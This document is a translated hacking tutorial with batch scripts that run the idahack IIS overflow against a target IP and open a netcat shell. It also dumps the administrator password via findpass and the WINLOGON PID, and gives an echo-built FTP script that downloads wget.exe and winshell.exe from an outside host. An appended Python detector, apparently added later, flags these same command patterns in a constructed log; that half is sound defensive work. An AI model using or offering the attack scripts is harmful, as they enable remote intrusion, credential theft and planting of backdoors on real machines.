Below we take one concrete program, idahack, i.e. the IDA remote overflow, as an example. It should be very simple.

___________________ida.bat_________________________________________________
@rem ver 1.0
@if NOT exist %windir%\system32\idahack.exe echo "ERROR: dont find idahack.exe"
@if NOT exist %windir%\system32\nc.exe echo "ERROR: dont find nc.exe"
@if "%1" =="" goto USAGE
@if NOT "%2" =="" goto SP2
:start
@echo Now start ...
@ping %1
@echo chinese win2k:1 sp1:2 sp2:3
idahack.exe %1 80 1 99 >%temp%\_tmp
@echo "prog exit code [%errorlevel%] idahack.exe"
@type %temp%\_tmp
@find "good luck :)" %temp%\_tmp
@echo "prog exit code [%errorlevel%] find [goog luck]"
@if NOT errorlevel 1 nc.exe %1 99
@goto END
:SP2
@idahack.exe %1 80 %2 99 %temp%\_tmp
@type %temp%\_tmp
@find "good luck :)" %temp%\_tmp
@if NOT errorlevel 1 nc.exe %1 99
@goto END
:USAGE
@echo Example: ida.bat IP
@echo Example: ida.bat IP (2,3)
:END
_____________________ida.bat__END_________________________________

Next comes the second file, which obtains the administrator's password. Most people say it cannot be obtained; in fact it is because they did not enter the correct information themselves.

___________________________fpass.bat____________________________________________
@rem ver 1.0
@if NOT exist %windir%\system32\findpass.exe echo "ERROR: dont find findpass.exe"
@if NOT exist %windir%\system32\pulist.exe echo "ERROR: dont find pulist.exe"
@echo start....
@echo ____________________________________
@if "%1"=="" goto USAGE
@findpass.exe %1 %2 %3 >> %temp%\_findpass.txt
@echo "prog exit code [%errorlevel%] findpass.exe"
@type %temp%\_findpass.txt
@echo ________________________________Here__pass★★★★★★★★
@ipconfig /all >>%temp%\_findpass.txt
@goto END
:USAGE
@pulist.exe >%temp%\_pass.txt
@findstr.exe /i "WINLOGON explorer internat" %temp%\_pass.txt
@echo "Example: fpass.bat %1 %2 %3 %4 !!!"
@echo "Usage: findpass.exe DomainName UserName PID-of-WinLogon"
:END
@echo " fpass.bat %COMPUTERNAME% %USERNAME% administrator "
@echo " fpass.bat end [%errorlevel%] !"
_________________fpass.bat___END___________________________________________________________

One more thing: once you have already logged into a remote host via telnet, how do you upload files (Windows)? Type the following into the window, one line at a time.
Of course you can also copy all of it and Ctrl+V it across. Then just wait!!

echo open 210.64.x.4 3396>w
echo read>>w
echo read>>w
echo cd winnt>>w
echo binary>>w
echo pwd >>w
echo get wget.exe >>w
echo get winshell.exe >>w
echo get any.exe >>w
echo quit >>w
ftp -s:w
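The three procedures above leave a recognisable trail on the compromised host: an FTP script assembled line by line with echo and then executed with ftp -s:, a process listing (pulist) grepped for WINLOGON to find a PID to feed to findpass, and an outbound nc connection after the overflow succeeds. The following detector is an added example and is not part of the original page or of any of the tools it names; it runs over a constructed command-line audit log (the log lines, the file name w, and the 203.0.113.7 address are all made up here) and reports each of those patterns, correlating the echo >> w lines with the later ftp -s:w so that the scripted transfer is reported as one finding rather than eleven.

```python
import re

# Constructed sample of a process-creation / command-line audit log,
# one command per line. Not taken from the original page.
SAMPLE_LOG = [
    'echo open 203.0.113.7 3396>w',
    'echo read>>w',
    'echo binary>>w',
    'echo get wget.exe >>w',
    'echo quit >>w',
    'ftp -s:w',
    'dir C:\\inetpub\\wwwroot',
    'pulist.exe >C:\\WINNT\\Temp\\_pass.txt',
    'findstr.exe /i "WINLOGON explorer internat" C:\\WINNT\\Temp\\_pass.txt',
    'nc.exe 203.0.113.7 99',
    'ipconfig /all',
]

# "echo <payload> >file" or "echo <payload> >>file": a script being built by appends.
ECHO_APPEND_RE = re.compile(r'^\s*echo\s+(?P<payload>.*?)\s*>>?\s*(?P<file>\S+)\s*$', re.I)
# "ftp -s:<file>": ftp driven by a script file instead of an interactive session.
FTP_SCRIPT_RE = re.compile(r'^\s*ftp(\.exe)?\s+.*-s:(?P<script>\S+)', re.I)
# Credential-dumping helpers named on the page.
CRED_TOOL_RE = re.compile(r'\b(pulist|findpass)(\.exe)?\b', re.I)
# findstr over a process list looking for the WINLOGON PID.
WINLOGON_GREP_RE = re.compile(r'\bfindstr(\.exe)?\b.*\bwinlogon\b', re.I)
# netcat connecting out to <host> <port>.
NETCAT_RE = re.compile(r'\bnc(\.exe)?\s+\S+\s+\d+', re.I)

# FTP verbs that move a file in either direction.
TRANSFER_VERBS = {'get', 'mget', 'put', 'mput'}


def scan(lines):
    """Return a list of (line_number, rule, detail) findings for the given command log."""
    findings = []
    built_files = {}  # script file name (lower-cased) -> payload lines echoed into it
    for n, line in enumerate(lines, start=1):
        m = ECHO_APPEND_RE.match(line)
        if m:
            # Remember what was written; the finding is raised when the script is run.
            built_files.setdefault(m.group('file').lower(), []).append(m.group('payload'))
            continue
        m = FTP_SCRIPT_RE.match(line)
        if m:
            name = m.group('script').lower()
            body = built_files.get(name, [])
            verbs = {p.split()[0].lower() for p in body if p.split()}
            if body and 'open' in verbs and TRANSFER_VERBS & verbs:
                findings.append((n, 'ftp-script-transfer',
                                 f'ftp -s:{name} runs an echo-built script using {sorted(verbs)}'))
            else:
                findings.append((n, 'ftp-script', f'ftp -s:{name} (script not built in this log)'))
            continue
        if CRED_TOOL_RE.search(line):
            findings.append((n, 'credential-tool', line.strip()))
        elif WINLOGON_GREP_RE.search(line):
            findings.append((n, 'winlogon-pid-lookup', line.strip()))
        elif NETCAT_RE.search(line):
            findings.append((n, 'netcat-connect', line.strip()))
    return findings


if __name__ == '__main__':
    for n, rule, detail in scan(SAMPLE_LOG):
        print(f'line {n}: {rule}: {detail}')
```

The echo lines are deliberately not reported on their own, since echo with redirection is common in legitimate batch files; what is unusual is the combination of an open verb and a get or put verb in a file that is then handed to ftp -s:, and that is the only condition under which the high-confidence ftp-script-transfer rule fires. A lone ftp -s: whose script was written by some other means is still surfaced, at lower confidence, for an analyst to review.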